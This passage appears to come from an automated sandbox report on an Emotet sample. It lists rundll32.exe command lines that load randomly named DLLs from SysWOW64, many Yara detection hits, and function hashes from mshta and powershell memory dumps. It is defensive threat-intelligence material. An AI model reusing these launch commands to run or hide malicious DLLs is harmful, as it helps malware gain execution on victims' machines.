                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.493927485.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.494040925.0000000002410000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:11
                                                                                                                        Start time:20:52:55
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",ZiXeiVCTiyE
                                                                                                                        Imagebase:0xd60000
                                                                                                                        File size:44544 bytes
                                                                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.496653771.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.496375881.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:12
                                                                                                                        Start time:20:52:59
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qnjiyxnfa\jxnctwsmnhcex.tox",DllRegisterServer
                                                                                                                        Imagebase:0xd60000
                                                                                                                        File size:44544 bytes
                                                                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538615152.0000000002850000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538520592.0000000000BF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538257691.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538139872.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538439653.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538498842.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538417405.00000000009C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538540998.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538682957.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538459946.0000000000A21000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538786600.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538736284.0000000002F91000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538591662.0000000002821000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538065858.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.538366137.0000000000900000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:13
                                                                                                                        Start time:20:53:16
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",lrHfvn
                                                                                                                        Imagebase:0xd60000
                                                                                                                        File size:44544 bytes
                                                                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.541336124.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.541752522.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.541212880.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:15
                                                                                                                        Start time:20:53:20
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Eyummksnnunnmycc\yekquepksxa.zkh",DllRegisterServer
                                                                                                                        Imagebase:0xd60000
                                                                                                                        File size:44544 bytes
                                                                                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673473149.0000000002FC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672675374.0000000000CF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672831223.0000000002881000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673078532.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672794567.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672749382.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672982289.0000000002B91000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672961471.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673602256.0000000003660000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673105429.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673360837.0000000002F21000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673205255.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673030786.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672529691.0000000000911000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672081662.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673507519.0000000002FF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672772312.0000000002761000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673316318.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673391096.0000000002F50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673131902.0000000002D51000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672329422.00000000007E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672931992.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673171132.0000000002D81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672613597.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672004438.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673263211.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673700095.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673435114.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672103586.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672388917.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673628550.0000000003691000.00000020.00000010.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                        Disassembly

                                                                                                                        Reset < >

                                                                                                                          Executed Functions

                                                                                                                          Function 02E63125 Relevance: .2, Instructions: 229COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416874953.0000000002E60000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2e60000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b08c7a44fdbb6b35ec66dc367492bf1aa0be1159da1e2334bcb5ca776d14df60
                                                                                                                          • Instruction ID: ab9afe3a6105cb6c7cd1f1fd1f542081fee9a0b2967bdd3711c2d02a42d2920f
                                                                                                                          • Opcode Fuzzy Hash: b08c7a44fdbb6b35ec66dc367492bf1aa0be1159da1e2334bcb5ca776d14df60
                                                                                                                          • Instruction Fuzzy Hash: BE51F42079CA484FCB88EB2C8849B31B7E1FB9D745F49C4EEE45AC7292DA24CC81C755
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02E63125 Relevance: .2, Instructions: 229COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416874953.0000000002E60000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E63000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2e60000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b08c7a44fdbb6b35ec66dc367492bf1aa0be1159da1e2334bcb5ca776d14df60
                                                                                                                          • Instruction ID: ab9afe3a6105cb6c7cd1f1fd1f542081fee9a0b2967bdd3711c2d02a42d2920f
                                                                                                                          • Opcode Fuzzy Hash: b08c7a44fdbb6b35ec66dc367492bf1aa0be1159da1e2334bcb5ca776d14df60
                                                                                                                          • Instruction Fuzzy Hash: BE51F42079CA484FCB88EB2C8849B31B7E1FB9D745F49C4EEE45AC7292DA24CC81C755
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02E63320 Relevance: .0, Instructions: 16COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416874953.0000000002E60000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2e60000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8a9c67f0bf317755b30a9a0ef768bdced4ddd15ea1eb730bf3fbce4e43cf8c71
                                                                                                                          • Instruction ID: b3967c3132f8bf11ceb7ae3bea12b062738981bafea561eb031d807d679c75c4
                                                                                                                          • Opcode Fuzzy Hash: 8a9c67f0bf317755b30a9a0ef768bdced4ddd15ea1eb730bf3fbce4e43cf8c71
                                                                                                                          • Instruction Fuzzy Hash: 25D0226210C2C00FC30262B9140E06C7B52CA172C8338A0CBC48ADF082C8118D568363
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02E63320 Relevance: .0, Instructions: 16COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416874953.0000000002E60000.00000010.00000800.00020000.00000000.sdmp, Offset: 02E63000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2e60000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8a9c67f0bf317755b30a9a0ef768bdced4ddd15ea1eb730bf3fbce4e43cf8c71
                                                                                                                          • Instruction ID: b3967c3132f8bf11ceb7ae3bea12b062738981bafea561eb031d807d679c75c4
                                                                                                                          • Opcode Fuzzy Hash: 8a9c67f0bf317755b30a9a0ef768bdced4ddd15ea1eb730bf3fbce4e43cf8c71
                                                                                                                          • Instruction Fuzzy Hash: 25D0226210C2C00FC30262B9140E06C7B52CA172C8338A0CBC48ADF082C8118D568363
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02BE0F91 Relevance: .0, Instructions: 5COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416952467.0000000002BE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2be0000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction ID: 2dd58b04b2ed210929de043cd6c63e558061e5d94eaea4343a81bb8f9be2dfb8
                                                                                                                          • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02BE0F89 Relevance: .0, Instructions: 5COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416952467.0000000002BE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2be0000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction ID: 2dd58b04b2ed210929de043cd6c63e558061e5d94eaea4343a81bb8f9be2dfb8
                                                                                                                          • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02BE0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416952467.0000000002BE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2be0000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction ID: 2dd58b04b2ed210929de043cd6c63e558061e5d94eaea4343a81bb8f9be2dfb8
                                                                                                                          • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02BE0F21 Relevance: .0, Instructions: 5COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416952467.0000000002BE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2be0000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction ID: 2dd58b04b2ed210929de043cd6c63e558061e5d94eaea4343a81bb8f9be2dfb8
                                                                                                                          • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02BE0F11 Relevance: .0, Instructions: 5COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416952467.0000000002BE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2be0000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction ID: 2dd58b04b2ed210929de043cd6c63e558061e5d94eaea4343a81bb8f9be2dfb8
                                                                                                                          • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02BE0F79 Relevance: .0, Instructions: 5COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416952467.0000000002BE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2be0000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction ID: 2dd58b04b2ed210929de043cd6c63e558061e5d94eaea4343a81bb8f9be2dfb8
                                                                                                                          • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02BE0F71 Relevance: .0, Instructions: 5COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416952467.0000000002BE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2be0000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction ID: 2dd58b04b2ed210929de043cd6c63e558061e5d94eaea4343a81bb8f9be2dfb8
                                                                                                                          • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02BE0F51 Relevance: .0, Instructions: 5COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416952467.0000000002BE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2be0000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction ID: 2dd58b04b2ed210929de043cd6c63e558061e5d94eaea4343a81bb8f9be2dfb8
                                                                                                                          • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02BE0F41 Relevance: .0, Instructions: 5COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000003.416952467.0000000002BE0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_3_2be0000_mshta.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction ID: 2dd58b04b2ed210929de043cd6c63e558061e5d94eaea4343a81bb8f9be2dfb8
                                                                                                                          • Opcode Fuzzy Hash: 72ee81b88a856a5b8792f03b1b95a003c1ca23df02401e42088910152dc52d5f
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Executed Functions

                                                                                                                          Function 000007FF002508A5 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.678176471.000007FF00250000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ff00250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 0-3887548279
                                                                                                                          • Opcode ID: 1f194547b33075a8aba96490ed9ebc4fd518626680926b437af449d943eb64d7
                                                                                                                          • Instruction ID: dbcd52a19cdcc5f4ec40e6fcab2a2c626b9587cd44ca7cd3b1a036812ecb0740
                                                                                                                          • Opcode Fuzzy Hash: 1f194547b33075a8aba96490ed9ebc4fd518626680926b437af449d943eb64d7
                                                                                                                          • Instruction Fuzzy Hash: 5D41086194E7C24FDB03977858A96607FB0AF57211B1E05EBC085CF0F3EA5C888AC762
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 000007FF00250A21 Relevance: .4, Instructions: 385COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.678176471.000007FF00250000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ff00250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a428b5dc9e02212094491f18375490e719668dd6c5ee2856b85cf959a723fc29
                                                                                                                          • Instruction ID: f541c0af8fcd865cface0a70ee359edab4624709e289bdf50015fbdf7086be68
                                                                                                                          • Opcode Fuzzy Hash: a428b5dc9e02212094491f18375490e719668dd6c5ee2856b85cf959a723fc29
                                                                                                                          • Instruction Fuzzy Hash: C6915B6191E7C60FEB039B789C656607FB0AF17215F0E45EBD488CB0F3DA58985AC362
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 000007FF00250DFC Relevance: .1, Instructions: 144COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.678176471.000007FF00250000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_7ff00250000_powershell.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
